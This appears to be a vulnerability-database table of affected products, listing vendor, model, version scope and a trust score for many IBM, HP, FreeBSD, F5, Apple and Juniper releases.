vendor: | ibm | model: | i v4r2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r1 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v4r1 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v4r1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | i v3r7 | scope: | eq | version: | 7.2 | Trust: 0.3 |
vendor: | ibm | model: | i v3r7 | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | i v3r7 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | hp | model: | vcx | scope: | eq | version: | 9.8.17 | Trust: 0.3 |
vendor: | hp | model: | tcp/ip services for openvms bind eco5 | scope: | eq | version: | 5.7 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31.09 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31.08 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31.06 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.23 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p9 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p6 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p5 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p13 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 9.3-release-p1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p9 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p7 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p27 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p24 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p23 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p20 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p19 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p17 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p16 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p15 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p14 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p13 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | 8.4-release-p12 | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 8.4 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-iq security | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | f5 | model: | big-iq device | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | f5 | model: | big-iq device | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | f5 | model: | big-iq device | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | f5 | model: | big-iq device | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud hf2 | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-iq cloud | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | f5 | model: | big-iq adc | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip pem hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf4 | scope: | eq | version: | 11.6 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.6 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf8 | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf7 | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller 11.1.0-hf3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller 11.1.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway 11.1.0-hf3 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway 11.1.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway 10.2.3-hf1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.5.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.4.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf4 | scope: | eq | version: | 11.6 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf8 | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf7 | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | eq | version: | 11.4.0 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x4.1 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.10.5 | Trust: 0.3 |
vendor: | juniper | model: | junos os 15.1x49-d30 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos os 12.1x47-d30 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.2r1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1x53-d20 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1r3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1r2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 15.1f3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.2r5 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1x53-d30 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r7 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 14.1r6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.3r8 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d40 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2x51-d39 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 13.2r9 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3x50-d50 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r12 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.3r11 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d45 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x46-d40 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | juniper | model: | junos 12.1x44-d55 | scope: | ne | version: | - | Trust: 0.3 |
